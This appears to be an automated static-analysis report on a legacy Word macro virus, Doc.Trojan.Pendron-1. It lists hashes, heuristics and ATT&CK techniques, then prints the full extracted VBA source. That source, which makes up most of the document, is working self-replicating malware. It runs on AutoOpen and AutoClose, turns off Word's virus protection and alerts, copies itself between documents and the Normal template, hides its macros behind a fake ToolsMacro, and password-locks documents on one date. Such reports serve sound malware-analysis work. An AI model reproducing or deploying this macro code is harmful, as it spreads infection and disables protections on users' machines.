Doc.Trojan.Pendron-1 — Office (OLE) malware analysis

Static analysis result for SHA-256 e2a7092542ed9ccd…

MALICIOUS

Office (OLE)

Size: 40.0 KB
Created: 2000-04-19 03:05:00
Authoring application: Microsoft Word 8.0
First seen: 2012-06-14
MD5: 0ec29e7bdfe4c3439d2755c94848d3bc
SHA-1: 9fb413790806764e55c02fa549be44f84c00b3eb
SHA-256: e2a7092542ed9ccd43f1031cfb22a0c3c353dc9fdeebbee591e9cdb8afad414b
Risk Score: 200

Malware Insights

Doc.Trojan.Pendron-1 · confidence 95%

MITRE ATT&CK
T1059.005 Command and Scripting Interpreter: Visual Basic
T1566.001 Phishing: Spearphishing Attachment

The sample contains legacy WordBasic and VBA macros, including AutoOpen and AutoClose functions, which are indicative of older malware families. The VBA script displays a deceptive message to the user, claiming ownership of their Microsoft Word installation, which is a social engineering tactic. The ClamAV detection name 'Doc.Trojan.Pendron-1' strongly suggests the family and its malicious intent.

Heuristics (5)

  • ClamAV: Doc.Trojan.Pendron-1 [critical] (CLAMAV_DETECTION)
    ClamAV detected this file as malware: Doc.Trojan.Pendron-1
  • Legacy WordBasic macro-virus markers [high] (OLE_LEGACY_WORDBASIC_MACRO_VIRUS)
    The OLE Word document contains legacy WordBasic auto-execution macro markers such as AutoOpen plus ToolsMacro/MacroFile/fileMacro/globMacro, or named historical macro-virus strings. These old Word 6/95 macro forms are not exposed as a modern VBA project, so normal VBA source extraction can miss them.
  • VBA macros detected [medium] (OLE_VBA_MACROS), 2 related findings
    Document contains VBA macro code
  • AutoOpen macro [high] (OLE_VBA_AUTOOPEN)
    AutoOpen macro
  • Auto_Close macro [high] (OLE_VBA_AUTOCLOSE)
    Auto_Close macro

Extracted artifacts (1)

Files carved from inside the sample during analysis.

Filename    | Kind      | Source                                                 | Size
macros.bas  | vba-macro | oletools.olevba.extract_macros (decoded VBA source)    | 3502 bytes
SHA-256: d09cbb0126a242d150cf33b9fa926946e7d4cb3030e831a49d4c9070f3a2c20d

Preview of extracted script (first 1,000 lines):
Attribute VB_Name = "ThisDocument"
Attribute VB_Base = "0{00020906-0000-0000-C000-000000000046}"
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = True

Attribute VB_Name = "AuAhGelap"
Private Declare Function SwapMouseButton Lib "user32" (ByVal bSwap As Long) As Long

Sub AutoOpen()
On Error GoTo kagabisa:
If Not Application.UserName = "Sembako" Then
With Assistant.NewBalloon
    .Icon = msoIconNone
    .Text = "Hello " & Application.UserName & ".              Sorry, but your Microsoft Word doesn't belong to you any more. Now it is mine!!"
    .Animation = msoAnimationGreeting
    .Show
End With
End If
Au
Ah
Gelap
kagabisa:
End Sub

Sub AutoClose()
Attribute AutoClose.VB_ProcData.VB_Invoke_Func = "Normal.AuAhGelap.AutoClose"
On Error GoTo kagabisa:
If ActiveDocument.Saved = False Then ActiveDocument.Save
If Not Application.UserName = "Sembako" Then
With Assistant.NewBalloon
    .Icon = msoIconNone
    .Text = "Hello " & Application.UserName & ".                    Sorry, but your Microsoft Word doesn't belong to you any more. Now it belongs to me ""The Sembako""!!"
    .Animation = msoAnimationGreeting
    .Show
End With
End If
Au
Ah
Gelap
Rem SwapMouseButton &H4
kagabisa:
End Sub
Sub Au()
If (Time >= #8:00:00 AM#) And (Time <= #9:00:00 AM#) Then MsgBox "Selamat pagi cewek-cewek yang cakep-cakep .", vbOKOnly, "Selamat pagi"
If (Time >= #12:00:00 PM#) And (Time <= #2:00:00 PM#) Then MsgBox "Hallo cewek-cewek, udah pada makan siang belum ? Sekarang udah jam " & Time & " loh.           Salam sayang buat kamu semua dari my creator.", vbOKOnly, "Selamat siang ."
If Time > #5:00:00 PM# Then MsgBox "Hallo cewek-cewek, kok belum pulang sih? Sekarang udah jam " & Time & " loh. Eh, ada salam dari my creator.", vbOKOnly, "Selamat sore. "
If Day(Now) = 18 And Month(Now) = 4 Then
    Selection.Font.Size = 24
    Selection.Font.Animation = wdAnimationSparkleText
    Selection.TypeText ("Happy birthday to my Creator! ")
    ActiveDocument.Password = "!@#$%BoMoH!@#$%"
End If
End Sub
Sub ToolsMacro()
MsgBox "Eit ! Kamu enggak boleh ngeliat Macro !"
End Sub
Sub Ah()
On Error GoTo rusak:
Options.VirusProtection = False
Application.ScreenUpdating = False
Application.DisplayAlerts = wdAlertsNone
Options.VirusProtection = False
Application.UserName = "Sembako"
Application.UserInitials = "SBK"
DocumentInstalled = False
Options.EnableSound = False
Set ActiveDoc = ActiveDocument
Set GlobalDoc = NormalTemplate
If NormalInstalled = False Then
    Application.OrganizerCopy Source:=NormalTemplate.FullName, Destination:=ActiveDocument.FullName, Name:="AuAhGelap", Object:=wdOrganizerObjectProjectItems
    ActiveDocument.SaveAs FileName:=ActiveDocument.Name, FileFormat:=wdFormatTemplate
    ActiveDocument.Saved = False
End If
rusak:
End Sub
Sub Gelap()
On Error GoTo rusak:
Application.ScreenUpdating = False
Application.DisplayAlerts = wdAlertsNone
Options.VirusProtection = False
Set ActiveDoc = ActiveDocument
Set GlobalDoc = NormalTemplate
GlobalInstalled = False
If GlobalInstalled = False Then
    Application.OrganizerCopy Source:=ActiveDocument.FullName, Destination:=NormalTemplate.FullName, Name:="AuAhGelap", Object:=wdOrganizerObjectProjectItems
    Options.SaveNormalPrompt = False
    ActiveDocument.Saved = False
End If
rusak:
End Sub

Sub ViewVBCode()
:
End Sub